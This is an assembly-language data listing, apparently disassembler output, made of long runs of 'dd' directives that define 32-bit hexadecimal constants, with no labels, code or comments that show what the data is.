		dd 0AA8854F5h, 0F83C7EF5h, 4903BB4Ah, 0F206310h, 9F5EC90Ch
		dd 0AE6344B1h, 61C9E30Ah, 524B72EFh, 0D8CA5652h, 0F57DC7DDh
		dd 80E14891h, 3CB42261h, 0D8D0C1F0h, 83F6588Ah,	0CC78BE65h
		dd 0B337383Eh, 4972EDD0h, 2488B90Ch, 598B0D94h,	15440DD6h
		dd 4C0086F3h, 0CDC1686h, 6369248h, 68C1036Ch, 619A3688h
		dd 0D71AE842h, 37584433h, 202B0CE2h, 91509DAAh,	4FDC0C6Eh
		dd 7E475F7Fh, 406FA4DDh, 0ABB4C1A2h, 8C2F8F42h,	9A06959Dh
		dd 0D93B6D88h, 0FF42955Dh, 83DF520Ah, 0A143C2E8h, 78C2B512h
		dd 0D419F864h, 8DF6AAB7h, 829EED80h, 0E7720DD8h, 1968709h
		dd 27661BB8h, 0D8552748h, 7F95B8C5h, 71B78BF9h,	8C747BFDh
		dd 2E0EB020h, 77795F89h, 9D28C718h, 0C8A7518h, 481F71C0h
		dd 30A634Ah, 5C06080Eh,	81DD31DFh, 0A83981A8h, 85A57F76h
		dd 0C511D9E1h, 0D9F30A30h, 24441C38h, 68C50F26h, 2CA2D7DCh
		dd 10C4C3BCh, 0E404A64Eh, 735002A4h, 5666740h, 51967E4Bh
		dd 85012824h, 80AD10ABh, 0C7424882h, 9E8D2E07h,	201198A1h
		dd 35718F95h, 8AF4AA01h, 0AFFFFCE3h, 2FB57C8Eh,	0A58115CEh
		dd 3C34FC01h, 84776Fh, 8D5B39CEh, 1510A1Fh, 0DC447A47h
		dd 4B16C290h, 254D08A2h, 0F80DE6CAh, 0E7BA5CF7h, 0A15F278Ah
		dd 113A2DAh, 8E20E5Bh, 424F14D5h, 0D3A7A049h, 0F2A2795Ch
		dd 1E8F12C6h, 0CD5B46EDh, 23F8F7FFh, 0F604080Bh, 7CC4BD24h
		dd 5E14FFDCh, 0A2168A1Ah, 796D02CDh, 0D61087AAh, 6C847DC7h
		dd 0AB481071h, 14026B2Bh, 5A676580h, 2C70BEEBh,	5AC7A323h
		dd 73BF4615h, 535A459Fh, 2C0F271h, 775064FFh, 86C17091h
		dd 15B39D73h, 0EBE90E38h, 95632CE9h, 0D668B02Dh, 0D505C480h
		dd 59A4A636h, 0BE3C32ECh, 0C8D820AEh, 1C1B65A2h, 0A090EB43h
		dd 0B621368h, 659D8E08h, 3768DB43h, 8DF9251Fh, 0CDC18E29h
		dd 0A51F89BBh, 0A43559DAh, 4314344Ah, 0F1ED1EEAh, 1010E9F9h
		dd 5F004CEFh, 768C71BBh, 0B7BC0D5Fh, 14BDBC85h,	0AEDC538Ah
		dd 0CC638BC2h, 1C994D45h, 22BB4A69h, 3682080Eh,	0A26B254h
		dd 0CBE5FF0Ah, 0D7723007h, 0B30112C4h, 66A00D9h, 2CF48D60h
		dd 0F4691FEFh, 1A36AF65h, 8F76911Bh, 96AFCB08h,	1C82188h
		dd 9348D29Bh, 0D48D74D4h, 5359185Dh, 56EEF406h,	0E8705004h
		dd 513D2610h, 99B11F40h, 5924EA8Ch, 3709C5CFh, 9C9C4C6Dh
		dd 0DB58929h, 3ECC766h,	0C77055DDh, 0E1B25134h,	0CD550840h
		dd 7782A8FFh, 73158A6Dh, 6210EF98h, 9CF81728h, 2B4CC9A5h
		dd 5E165057h, 70F16044h, 41C0D476h, 298AF795h, 3895D989h
		dd 0D631C758h, 35F4E230h, 0DF0E029Eh, 2D3D93C9h, 2F13E919h
		dd 5F0A662Ch, 3609FFD1h, 0A9CC30A6h, 86F5851Dh,	86A262EBh
		dd 0ABFDAF79h, 5F8AA016h, 0B565374Ch, 1CB82259h, 296E791Ch
		dd 6B2C5356h, 0D6058311h, 64ED635Fh, 91D080EDh,	20F7BEA8h
		dd 0EB303561h, 24E6E2D8h, 9D0F7C18h, 0DAAD32C7h, 6636C2C1h
		dd 17663D74h, 54312E35h, 0B234F04Ah, 63E26B8Ch,	0A0985AE4h
		dd 45A91BDh, 82846D78h,	0E62A28D9h, 0CADE689Dh,	3461D204h
		dd 0B85F3376h, 4B91C89h, 0BB9F2502h, 83ABBC6Ch,	31E22E18h
		dd 0FA2239E4h, 7D49A6BEh, 584C36ACh, 659F6128h,	0BA761F96h
		dd 43AB90C4h, 0A300ED19h, 0C0602A84h, 0A22A3CCBh, 74E0ABB3h
		dd 0C2A96FA9h, 75E02E76h, 0A6C0ADCh, 0D92A5922h, 8EB12D6Eh
		dd 5C42F981h, 5FD2834Dh, 2E26AB43h, 0F806E726h,	0DC4B7A4Ch
		dd 58DDB0A1h, 2D5B6A03h, 372EF21h, 0C0C49829h, 6482C3Bh
		dd 99F9701Ah, 2560F43h,	8B5C9DCFh, 0BDEFA808h, 0CB5667D8h
		dd 29BE41DDh, 0A9EE7153h, 50618E01h, 0D3A9FA09h, 251E9871h
		dd 8B6C098Dh, 8254497h,	0E4035C20h, 4B5AA7Bh, 0DFA48E43h
		dd 0BC0A6114h, 9A113800h
		dd 0B30B9504h, 0BE521D17h, 62CDA905h, 0E346393Bh, 8F0597D9h
		dd 650727F1h, 9476B091h, 64A36A0Bh, 3BA61387h, 0BFC1D1FAh
		dd 40D6A134h, 0E0BB98A0h, 0CEEE8CC7h, 1C30C226h, 0A2AA498Dh
		dd 0C38AFD5Ah, 7595368Ch, 0C7495A30h, 1E945078h, 4DE37C7Eh
		dd 4CFAABB0h, 0CAA84051h, 4856A1E7h, 0D511DBE9h, 67CC3B5Ah
		dd 66253FF6h, 1D82A300h, 804A45C5h, 0C4113E39h,	15531EF8h
		dd 0ECCBDC6Bh, 247244BCh, 322B94C9h, 2D9FA2E4h,	8404A750h
		dd 289087DDh, 56AA5902h, 242D1462h, 0A2D82AD7h,	41E5CFD8h
		dd 60664554h, 5D954BCh,	775B5828h, 83B6C0BCh, 0E65B519Dh
		dd 1E18554Fh, 0C0FB6298h, 2C63CAC9h, 0F684DD30h, 9E895EBDh
		dd 7A441894h, 4FC9E3D2h, 317D1055h, 197A4268h, 9FB35315h
		dd 0D5970AAAh, 5F922AA7h, 3056EBA0h, 0C43D580h,	0B545C72Ah
		dd 9187A953h, 4E3A149Dh, 0D097103Ch, 6A5018ACh,	0C8335D27h
		dd 0FE774905h, 260C528Ch, 0E7751AEBh, 44ADD901h, 0CAAAB440h
		dd 0AA82181Dh, 2F7B9A0Ch, 33E824A5h, 3EF43E4Fh,	68E9C5CEh
		dd 26847E8Ch, 56768B5Fh, 222879A5h, 0C7C707CAh,	0F24BC8D0h
		dd 92D5411Ch, 6FB322E7h, 0A2E63DF3h, 8243A5BAh,	96931A8Eh
		dd 6AEF8EC2h, 5130BF99h, 6C47F1D8h, 39397BB4h, 2E90E0C2h
		dd 0E805AC41h, 340C9553h, 0C9D8F45Ch, 89D4EEE4h, 0D34E60C6h
		dd 3A94F040h, 5657E3ABh, 65DE22A7h, 0F2BB17FEh,	0B7B16402h
		dd 0C5E4B88Ah, 0D48ACE29h, 1CC61981h, 5D572845h, 2B31BBB8h
		dd 0F207BC7Bh, 0F105E095h, 1AEA2DA2h, 0C202A12Bh, 33CD0267h
		dd 3847F9E4h, 35332A8Dh, 0B536EA2Fh, 0DFED2723h, 4F617BA9h
		dd 413BAA80h, 8EB2079Dh, 15150FB8h, 0E02DC8A8h,	0B2EFC7DEh
		dd 3A69173Eh, 267FA02Ch, 0DB09EB43h, 64AA687Eh,	45F03471h
		dd 6FD5157Bh, 0E781784Bh, 0A6A0C5A1h, 925F1D17h, 0D9DEDBA6h
		dd 0CD9398Ch, 8B40481Ah, 0CDA922EAh, 0E9AA7FEh,	0AAB5F552h
		dd 9E4B540Fh, 24A1219Bh, 75ABFD85h, 968A05F4h, 98913182h
		dd 230F87DDh, 0C5955B3Ah, 0EE804148h, 0D2534B5Ah, 0EE5B869Eh
		dd 580F573Eh, 8ABC0934h, 5D55ABA3h, 10D6BE25h, 0B6AA838Ch
		dd 45129D52h, 5749CE8Bh, 2AAD679Eh, 5BD42C8h, 0AA3DE936h
		dd 72050893h, 0EB976397h, 5B18CD8Ch, 60292281h,	424471DBh
		dd 43959036h, 81AA1570h, 2A4F1F94h, 0D608416Fh,	2B4A080Bh
		dd 3DE21ACCh, 58201088h, 1C6CAACh, 392C2047h, 0D453C88Eh
		dd 167F6D5h, 38BBD229h,	6D259662h, 0FA5BE998h, 0DBFF694Ch
		dd 0FC559F47h, 0CBACF085h, 0C9A056EAh, 72B70E67h, 2A34ABF9h
		dd 0C9F80475h, 77030952h, 320B29B5h, 4B2A44CAh,	292093C4h
		dd 96564C80h, 0BC5A5965h, 5B8A5B01h, 389BA515h,	4A89B629h
		dd 4BA514C5h, 0FAE5994Eh, 0C50601C0h, 0E92A421Eh, 5142BD2h
		dd 0A8F3B474h, 0A15A4DAAh, 659A57D4h, 8DFB5CEh,	87B0D178h
		dd 16A85B26h, 0E31007AAh, 0DE832B27h, 8EB9E47Fh, 8827A589h
		dd 660CA896h, 6890E01Ch, 1A3ED9A9h, 0CA3D7E15h,	0C86D164Ah
		dd 0AE8214F5h, 30461380h, 7CD998A6h, 0FAB94B18h, 4B4451B4h
		dd 771C0747h, 2CF2D034h, 3F0DC501h, 56C23BE9h, 0A8C0240Ah
		dd 9C28E973h, 7C0B68FDh, 0ECFCAB41h, 0D0984A5Bh, 0F40053Ch
		dd 742AC6FCh, 715EC3BEh, 361DBD6h, 86A536D6h, 0C60C3257h
		dd 85FAD12h, 0CA17C06Eh, 2136F305h, 54204C7Eh, 0DCB405ABh
		dd 4073DD17h, 0B142A27Bh, 0AF11D697h, 42695D4Dh, 0FA478989h
		dd 526FA2AEh, 750948C5h, 84A5E71Fh, 1270EC50h, 0AD07C898h
		dd 5D3D880Ah, 5643ED50h, 34923453h, 126DBC78h, 94D316A4h
		dd 2BD67F0Ah, 0DD953120h, 0BB95D4D5h, 17FB04E3h, 51D57AFBh
		dd 571B23A8h, 89B45665h, 74CFB7A5h, 0BBCAA125h,	0ACCE6ABBh
		dd 6599EA73h, 8BD11404h, 139BEA68h, 3802062Ch, 70CEDB57h
		dd 23D4AAF9h, 39DAA7Dh,	563E4547h, 0AF09F5E1h, 0FA64DE2h
		dd 35D12EAh, 68F6937Fh,	944538D4h, 69E096C1h, 0EC117268h
		dd 0B6604368h, 0AC0D39EBh, 691C6548h, 0C1A73A38h, 4E26B55Fh
		dd 37252B02h, 6C356983h, 0B3479065h, 4E74573h, 754A9532h
		dd 9683638Eh, 3B143050h, 3A453027h, 626F17E7h, 0DA90892Bh
		dd 0C2AD2ECEh, 1C3443C0h, 8ED620A9h, 0BC9FB68Ch, 0D6E86E8Ah
		dd 1674A2A8h, 3172795Dh, 0D6615654h, 40D437E3h,	41040E8Ah
		dd 6607401Ah, 53457BABh, 0D1415293h, 0ED04533h,	3E419F2Dh
		dd 0AA8A4E2h, 6206181Eh, 559FA1E4h, 4215898Ch, 825FE4E5h
		dd 124AFC17h, 0CF312DCBh, 0EBE52F26h, 4B6E24F8h, 279D068Ch
		dd 0A2860421h, 0AAE97E82h, 681A93B1h, 14AF79A3h, 0E0A82E10h
		dd 0B2648F03h, 45DD6A0Ch, 4999A20Ah, 82B1C9CDh,	0C46B918Eh
		dd 0C4EDB8DCh, 128FAC45h, 3B99610h, 8F428333h, 19E77758h
		dd 0BE335055h, 330898DEh, 0DE3E4676h, 26578CC0h, 52C81480h
		dd 0A70D5A17h, 0C44F8F5Ah, 6A8002D5h, 99158A69h, 1FD3AF8Eh
		dd 14AEC22Ch, 0B5A38529h, 22AC30A2h, 6C6B1113h,	55073BCEh
		dd 4B4E3816h, 0CF1C7D03h, 86B27961h, 46CC02C5h,	0DC8B1379h
		dd 0A116409Dh, 0CE7D7164h, 0A0946467h, 1F606736h, 869912E9h
		dd 8E03E56Ch, 3A451B38h, 9825E622h, 291BC1A5h, 635F4F8Eh
		dd 152F408Eh, 174BC691h, 0B82681D0h, 9DB7A749h,	0B1B2DD3Dh
		dd 69622BD4h, 70FCEEFh,	0A37E81F8h, 77B4D2F5h, 0C9107967h
		dd 0BB948174h, 3B158A33h, 1AA5B31h, 9C8270ADh, 9231E906h
		dd 20A42AE9h, 281CC73Dh, 5BA63D57h, 96A8765Ah, 615EA738h
		dd 0DC3C16FAh, 624601CAh, 32C4FE19h, 15CB5335h,	47945A9Eh
		dd 971AEADCh, 4A401048h, 6DF00AC6h, 0F55F412Fh,	817142EBh
		dd 0C09F0619h, 0D3529EAEh, 9F5E8134h, 281DEEBBh, 693EBC11h
		dd 127F256Fh, 0EDCC47ADh, 59EB7B2Ch, 57DBB313h,	0F6DC2666h
		dd 0E35F8E65h, 0EDD365F6h, 57DB62A8h, 0A0E8F5D0h, 4AF27DD7h
		dd 6A56CBAAh, 1D77FB6Bh, 0A5AFD300h, 228B60A1h,	0B07CF832h
		dd 0C82178F5h, 7986A1F2h, 8832677Eh, 33C90708h,	0D74A413Bh
		dd 9D302561h, 21F001AEh, 9B1B790h, 0D98EECF0h, 1FF17177h
		dd 0BC438ADBh, 0C4F30698h, 8F5E2A02h, 3EC8BDE9h, 0E185795Dh
		dd 157E9A62h, 7D4B303Fh, 1163D291h, 74880CE8h, 8C0F150Ch
		dd 1D84FAE5h, 5804C0Ch,	0C205CED2h, 0E1ED9BEFh,	93ABAEh
		dd 537B7C8Ch, 1FEAA4C4h, 1E610CB7h, 50C30CD8h, 63EB0768h
		dd 0B83114ADh, 11062F8Dh, 0F51615A1h, 9688DBB4h, 7911F622h
		dd 7914CA2Ah, 157E4904h, 0FBCA6FCh, 9387DCC6h, 9E6AA847h
		dd 479C3A8h, 7E45114Ch,	0CE1B39FBh, 44235E52h, 0FF4F091Eh
		dd 0AEB1AC12h, 9828116Dh, 231B4CB5h, 656C10h, 7C0C56Ah
		dd 67E182EBh, 239C8407h, 783114B4h, 0E7F14FE2h,	0D43B8ADh
		dd 51148386h, 7360A8A6h, 9A846567h, 30A5C6EBh, 3CC454C8h
		dd 612AE782h, 0B8093B8Ch, 1E887111h, 6A27A431h,	271F47D1h
		dd 0A030ED17h, 11D6B474h, 8B0E6B87h, 725B822h, 0C95A7643h
		dd 0CA09CA35h, 0F57733FCh, 0C3E01D19h, 8528898Ah, 74D05DF0h
		dd 0D191F2C0h, 7388231Eh, 0D13C9E79h, 37DAE55Ah, 25F25908h
		dd 0E0A0804Bh, 58E896F1h, 0E3485D94h, 23802BC0h, 607244D2h
		dd 92DA5D9Ch, 5D10EC7Dh, 38782380h, 88E08630h, 181C1135h
		dd 0E2331746h, 0C11CBD1Bh, 303DC8Eh, 38B702E9h,	174E9700h
		dd 0AB0808E0h, 700B181Ch, 0E559C04h, 0E238B08Ch, 0C607C44Dh
		dd 271105D8h, 0EA6429C2h
		dd 0C2801C02h, 47003581h, 0E7A89C8h, 9DA0BAA8h,	4EE2154Eh
		dd 27D3DA35h, 380562DBh, 7308FEC2h, 0DC97DA48h,	2EDC7D3h
		dd 911F411Ch, 44706303h, 80E67A5Dh, 0D08C0BB6h,	2731A418h
		dd 33814910h, 68214082h, 0B56CD3B8h, 0A2D05D22h, 0D4875CC6h
		dd 8BE73B4Eh, 0B5EF12B3h, 76785D7Dh, 0F0E2F9D6h, 86F91702h
		dd 931A2567h, 999F4B0h,	0CE234534h, 0C389C454h,	5706C751h
		dd 274D8C8Eh, 72042689h, 28458B23h, 7D71CA09h, 40008017h
		dd 0C0000224h, 0D0000001h, 434A0041h, 6000h, 0
		dd 20D0B4D4h, 523E7C78h, 86BB794h, 423DEE05h, 0C898B18h
		dd 1865A168h, 5F8D2142h, 0D5A139C7h, 86D718h, 81A4B30h
		dd 86C7388h, 5733C0C1h,	23011E76h, 88182D3Dh, 5020AC9Dh
		dd 50F8060h, 0F26D4080h, 0D63C30h, 185C7100h, 2164DD83h
		dd 87DE1C0Ah, 1EBFD810h, 7DA38851h, 2F60A1D4h, 0D1810662h
		dd 0FC85FE72h, 21BED00h, 30752FA0h, 41A2C280h, 855A080Ch
		dd 1A4DF020h, 43F8484Eh, 0E92061F6h, 8A01042Eh,	5C85823Ah
		dd 215BB38h, 184AEE20h,	21698B01h, 86864E02h, 1EA091E2h
		dd 0DBC04317h, 43030AAEh, 0BC042836h, 4030F5F8h, 804375D2h
		dd 43AF7543h, 0EF18050Fh, 0DE04042Bh, 51D1A1D9h, 2127FA80h
		dd 8643842Eh, 1C8D5028h, 773CA041h, 2ABA210Ah, 0E9A15CCAh
		dd 8307CFB8h, 8452C604h, 10AD321Ah, 2B6A140Bh, 0F8385DB4h
		dd 1830502h, 85E510Bh, 0EDDC043Ah, 1A507089h, 9E4369B3h
		dd 1098D6Dh, 9B75C10h, 259C2432h, 5FD42F1Ch, 0C0308BF4h
		dd 10D86B00h, 837D2C42h, 45B90E09h, 0C4C1080Eh,	0A40825D4h
		dd 14367734h, 2D74743Eh, 0DB2438F6h, 5010AC46h,	5084D641h
		dd 3F34042h, 9B3F0208h,	0D6D00438h, 9A10F0E0h, 0E390EC51h
		dd 90D8F280h, 0C3D7A401h, 8466C0Ch, 3895D050h, 0B45050F8h
		dd 8F0DB63Ch, 41B9CAAh,	15650F29h, 1EAD084Ch, 1404267Eh
		dd 9FF92D14h, 488E811h,	60100B48h, 0C0928180h, 8C112829h
		dd 16017143h, 0F1420A74h, 852E7C02h, 15DF90C8h,	4A338021h
		dd 11FAA113h, 0E7A9796Bh, 90DE0B88h, 347C046h, 4094858Eh
		dd 283008C1h, 0D2842509h, 4A14942Dh, 286250D4h,	0A1C943D2h
		dd 8825114Ah, 24944D28h, 0A25154A2h, 0C945D28Ch, 25194A34h
		dd 946D28E2h, 51D4A3CDh, 48F7AF95h, 411A0E58h, 8495226h
		dd 95752BCAh, 5954B629h, 7352F4C1h, 3FFE4BFFh, 30082420h
		dd 233D4A96h, 959D2C1Ah, 4C029769h, 8D0147C2h, 0A20213ACh
		dd 221DFD62h, 1EAFDA13h, 9DA95620h, 6FD45C2Ch, 3D784610h
		dd 0CAD30E75h, 8AC36490h, 14B612B7h, 0D8CB5D2Dh, 25ADC87Bh
		dd 22142234h, 32A101A0h, 98008818h, 0F152DB80h,	8D400C7Dh
		dd 89C521E8h, 46254997h, 3BA5CAD3h, 6EB3C80Bh, 0DBC91511h
		dd 40242206h, 97613C2Ch, 2A0C315Ch, 2DE68C0Bh, 3D803475h
		dd 0B306582Ah, 0B6EB593Bh, 7DDCA482h, 0CB78B194h, 0B833B844h
		dd 0C040EEE6h, 6D30A7C2h, 7EC10933h, 823050C1h,	8C03A7Fh
		dd 0E0E451D3h, 163B9DBh, 7C101611h, 0E58A1241h,	5C9C648h
		dd 2453BC17h, 1C09C5Ch,	40420302h, 81C120B0h, 683C2213h
		dd 0A85C321h, 0B0E87C42h, 231289C5h, 22B168BCh,	62331A8Dh
		dd 0C723B1E8h, 0FC824322h, 91C924B2h, 693CA253h, 2A95CB25h
		dd 0B2E97CC2h, 633299CDh, 26B369BCh, 0E2733A9Dh, 0CF27B3E9h
		dd 0FD028342h, 0A1D128B4h, 6A3D2293h, 4AA5D329h, 0B4EA7D42h
		dd 0A352A9D5h, 2AB56ABDh, 62B35AADh, 0D72BB5EAh, 0FD82C362h
		dd 0B1D92CB6h, 6B3DA2D3h, 6AB5DB2Dh, 0ADEC5C2Eh, 3725068Bh
		dd 0ADDAEF78h, 0BCDEAF77h, 0CBEDFAFEh, 0A6A0D195h, 16DD63B7h
		dd 84A540AAh, 8625D0BDh, 0C8106974h, 5A9538A5h,	32673297h
		dd 510B1222h, 918B2B10h, 3946B65Ch, 0CA193648h,	8AA65EEh
		dd 95651C0Bh, 0A819D1D1h, 0EA0A9A68h, 1E52822Ah, 2F175227h
		dd 80265244h, 10EDC7C1h, 0B0E2DD08h, 51C45A20h,	0A0D00404h
		dd 0E0462094h, 500482A2h, 4D660A76h, 14F209Ch, 19AC2830h
		dd 119BCC09h, 55CD28CBh, 48091D44h, 2D60B413h, 5024BCh
		dd 5C09802Ch, 20225C30h, 0B1248A0h, 481F2C8h, 5BEE545h
		dd 0BC29EE54h, 0BB41965h, 0B992040Bh, 69532090h, 0D604BAC8h
		dd 3D044DA9h, 324F448Ah, 0AB54A34Bh, 670C114Ch,	66D4CA28h
		dd 29D3A934h, 3A7D100Bh, 2E5756E9h, 2D36DB2Ah, 0C401A108h
		dd 26E4E90Dh, 852154A6h, 53EA6498h, 4803E227h, 6934EA3Ah
		dd 3CA1214Fh, 0A6D04131h, 84B2A536h, 98295201h,	25056662h
		dd 0C370256Ch, 0B4ADBEC7h, 6D062E65h, 6DA56C82h, 0D854186Eh
		dd 8A27076Eh, 556BB16h,	0BA1C060Ch, 0DA017286h,	4D9F1033h
		dd 2C472C24h, 0EF264C29h, 390A8290h, 25D2D876h,	5D0AA816h
		dd 342080E0h, 9012064h,	0B140CB65h, 0EE938B81h,	3BA81E05h
		dd 0E0348505h, 0B4B599AFh, 62EDF308h, 88169B09h, 39735763h
		dd 50612425h, 0B20A0B43h, 0B975171Ah, 6B6C94C1h, 856A3ACCh
		dd 0D945B463h, 6D22B03Ah, 0C872C4h, 0D021AB25h,	0D5C55428h
		dd 25B76B2Bh, 130080E3h, 0E3917Ah, 17F85550h, 308142C8h
		dd 0D269650Eh, 92762BADh, 9C104A5Eh, 6DE1D8D5h,	9A4B8F52h
		dd 47302B5Ah, 802A0400h, 0A96BB28Bh, 0CB67A5C8h, 35162001h
		dd 22DF6617h, 878581B6h, 50AA6944h, 96A0D4C5h, 0A5400142h
		dd 82512F38h, 62E52969h, 0F14290C8h, 95354658h,	5A55C34Eh
		dd 7D97506Ch, 6FD80341h, 0DE882514h, 0DB0DA5BFh, 31BE1264h
		dd 896EB78Ch, 0E594051Ah, 7CB4286Ch, 5C144E0Eh,	285ECF44h
		dd 455431D9h, 430D2629h, 0F37E2D65h, 52F72A55h,	451C300Dh
		dd 1AD60EC1h, 50972820h, 0EE34E284h, 0D104A9A8h, 119872C8h
		dd 0C414CA70h, 88DF6586h, 0C56CB2B4h, 1FCD040Ah, 3576051h
		dd 4DDB937Ah, 0EF6928A5h, 0C7CC7185h, 13594572h, 0C8C70FD3h
		dd 544B85D5h, 0BFABB5A4h, 0B5D0C844h, 2942E299h, 4814E145h
		dd 3466076Ah, 0F8561A72h, 0D897A853h, 0EB6E8Dh,	0C68CC0D3h
		dd 19CB7C78h, 4EE060EAh, 9D8C5010h, 6C850740h, 0EB1674E1h
		dd 30470252h, 0C6269645h, 699CAC7h, 824A6E9Fh, 5B567787h
		dd 62D1720Ah, 0C3AB0325h, 0AD8C3450h, 63718D62h, 6D70130Bh
		dd 0D28A79E3h, 9EBF0465h, 0C6EAB000h, 34CB7355h, 273971B2h
		dd 604C59A4h, 38B5E0B3h, 0ACA7822Dh, 0DF03A13Bh, 9A882977h
		dd 2AE79AEEh, 36244A72h, 9AC088A5h, 0B41596D0h,	20BA05C8h
		dd 594E1358h, 0C94B3DD4h, 29AE6CB0h, 0D3244B33h, 0D8A5D171h
		dd 0CD8060D0h, 77BDAF2Dh, 74C0094Dh, 6B206114h,	0AE2CC0B1h
		dd 5636DBCDh, 43959250h, 216A63DDh, 0AC1450A0h,	0B9970021h
		dd 19E5C02Fh, 2CE0A96Dh, 7360085Bh, 0AAE5934Fh,	87058CEAh
		dd 2A93E921h, 0B8A8313h, 93A902E3h, 0FE9F0BFBh,	45FF4CFh
		dd 3085205h, 0CA85400Dh, 712A143h, 0C00212A6h, 5861395Fh
		dd 2A4DC404h, 7E360A16h, 8A1A9636h, 0B3F3FC70h,	0A3F6ED2Ch
		dd 5822C0Ah, 91C1622Ah,	4A973224h, 0ED2040A3h, 9164B306h
		dd 0B2807125h, 0C2094292h, 0D26C10ACh, 212C00ABh, 32D31983h
		dd 50793FB0h, 87B04908h, 30028765h, 9C04828Ch, 3048A88Ch
		dd 5DC8DC76h, 0F4023BC5h, 0E98313B5h, 5EB86742h, 0C97AD1E6h
		dd 1555490h, 3016D284h,	58EA2BD4h, 85E82180h, 0B53088BDh
		dd 104DB028h, 0F40517E8h, 823D8247h, 0A048BF44h, 13A40B01h
		dd 2BBB5A13h, 0D5202C05h, 84917E58h, 0B63EC05h,	90245F96h
		dd 27180BFh, 4700BF80h,	2A289307h, 28551E80h, 0B00BACC6h
		dd 1A409809h, 0DE100612h, 0D092A8CEh, 980C0E0Bh, 784C2E1h
		dd 0B0F88C4Eh, 2B178CC6h, 0E3B1F90Ch, 8E4B2794h, 0CAE5B2F9h
		dd 8CCE6B37h, 9CCEE7B3h, 0FA0D0E8Bh, 47A4D2E9h,	0B4FA8D4Eh
		dd 0AB57ACD6h, 0EBB5FB0Dh, 8ECB67B4h, 0DAEDB6FBh, 8DCEEB77h
		dd 0BCDEEFB7h, 0FC0E0F0Bh, 87C4E2F1h, 0B8FC8E4Fh, 2B97CCE6h
		dd 0F3B9FD0Eh, 8F4BA7D4h, 0EAF5BAFDh, 8ECF6BB7h, 0DCEEF7BBh
		dd 0FE0F0F8Bh, 0C7E4F2F9h
		dd 0BCFE8F67h, 0AF39ADF6h, 0FBBDFF0Fh, 8FCBE7F4h, 0FAFDBEFFh
		dd 8FCFEBF7h, 0FCFEFFBFh, 0EAA64AAAh, 2A953ACAh, 0A64AE8A0h
		dd 6EF6751h, 0D1A0377Bh, 3D2D5201h, 0DD15C49Fh,	0E6207C52h
		dd 3D533F2h, 0D45EA412h, 9D5B4914h, 0B9AF2A25h,	90016592h
		dd 0A6A4580h, 9AF200A4h, 40C25E81h, 432E8C89h, 503A8504h
		dd 455CD81h, 54D815CDh,	34234EB7h, 0DD9831A9h, 0EAA1F005h
		dd 0D535E6A1h, 85528375h, 0B39359C4h, 20A517Bh,	60898105h
		dd 0BACA8941h, 0B85C97BBh, 529B6133h, 63B42546h, 0B2D88D5Dh
		dd 5D333294h, 66DC05E3h, 423042C4h, 2A426424h, 42241C37h
		dd 91121020h, 0F20D2090h, 2B74BA9Fh, 0B216113Ah, 30BE015Dh
		dd 52D00997h, 3614AAF6h, 5343E8C1h, 0B552EAC1h,	4536DF6Eh
		dd 47A9DD5h, 8221100Fh,	20E20C20h, 0A2092082h, 2349550Dh
		dd 54A1DC80h, 0A5FA80A9h, 9B7EAB4Ah, 8781BB8h, 192D4336h
		dd 12974171h, 0B5B7D034h, 16C5D020h, 578E6005h,	900325B6h
		dd 0E06ECAF9h, 5853EC56h, 0A0C9314Ch, 5DADE2B7h, 293839DBh
		dd 15C270BDh, 22D21A0Ah, 525E4DBh, 7A87CC0Bh, 0C5C187E0h
		dd 80A13E63h, 0CC4A506Eh, 41217993h, 0B0A38C5Fh, 8AF0C851h
		dd 5AE8AA5Eh, 4F595915h, 0EB02AD3Eh, 8AA44811h,	0D6A3F3Ch
		dd 759D4638h, 0B83C582Dh, 0AA1C84CEh, 0BF301762h, 0B631162Ch
		dd 56E17957h, 374B496h,	69A9924Bh, 312462Ch, 4FCB6CC5h
		dd 4F8C598Ch, 0A1AD64BCh, 8F85B5A4h, 0E552EF2Ch, 85D8999Fh
		dd 8C664818h, 91156B25h, 9879AC07h, 2D061A4Dh, 0D462CE6Bh
		dd 9F650415h, 1A51E6E0h, 0F1438566h, 505E53E4h,	38E170FDh
		dd 0F0096AC0h, 895BAE85h, 829205CDh, 56F21920h,	620D187Bh
		dd 0AC0B1B8Dh, 0EA2B80E9h, 73316704h, 164260E1h, 3AB31177h
		dd 265373Ah, 0ED6655BEh, 11A1F664h, 96624701h, 6A55425h
		dd 491F2A2Dh, 20042EB6h, 41E80947h, 0E41AC26h, 32B60507h
		dd 959A41E5h, 1C1714D8h, 7C628C50h, 0FDD948CDh,	9640D657h
		dd 83F2C866h, 0E6A11B8Ah, 3A875688h, 5C53C1D9h,	4C05514Bh
		dd 8552E6A1h, 9C4CE28Eh, 78AB4FCCh, 938B4C65h, 96CD615Dh
		dd 9CE50ADFh, 1A01E640h, 5E6BDC61h, 65AC0EB3h, 0EB3100E5h
		dd 0A68E56E0h, 315D1CE0h, 2DF66644h, 823491C1h,	32536B81h
		dd 4ACCC18Dh, 5E5FAC8Bh, 0E008C992h, 9E120149h,	0F1201092h
		dd 818CBC04h, 65A94AD2h, 95257C24h, 84989206h, 348046Fh
		dd 0C94A2528h, 4B008433h, 40400867h, 89154A4Ah,	232F4A5h
		dd 0B3E95110h, 0CD110032h, 120153Ah, 6B2A073h, 105D1A4h
		dd 513188A4h, 0B5452110h, 12849DEBh, 69E092Ch, 0F892DA0Ah
		dd 2D988145h, 5F24BA54h, 96CB4D9Ch, 0F2C8063h, 7271EA3Ch
		dd 80315C00h, 0A26D3402h, 15F3086Fh, 340B351Fh,	0C08060D0h
		dd 0C17E6F9h, 8310162Ch, 8C48D703h, 40BCCB83h, 0A0381F80h
		dd 42B5D472h, 50FC0DD4h, 8F5D048Dh, 46689h, 4A128E25h
		dd 104A0897h, 0F3D487C1h, 2F22592Eh, 0A2128F32h, 10C4BF1Eh
		dd 543B096Fh, 12EE038Fh, 50047201h, 3D0021Eh, 6008F212h
		dd 0E225C04Bh, 7896C12Dh, 625A84B4h, 896812CEh,	25984B28h
		dd 96412C62h, 5884B089h, 6012BE25h, 784AE895h, 0C12B6256h
		dd 84AC8958h, 12AE2558h, 4AA89541h, 2A625484h, 0A8895012h
		dd 9E25384Ah, 6894A128h, 0E25144A1h, 97C3D24h, 0BC7BCC93h
		dd 584041AFh, 339A4320h, 85BCCE89h, 0A8212F3h, 3AA42186h
		dd 3D1EF33Bh, 24398609h, 6ACCEE90h, 0C2216733h,	0C242B085h
		dd 4CCF290Ah, 6213B33Dh, 24230843h, 0CCF69082h,	18F3FCCCh
		dd 0F890EC18h, 10DC259h, 4AD0950h, 128A25F8h, 0F321D44Bh
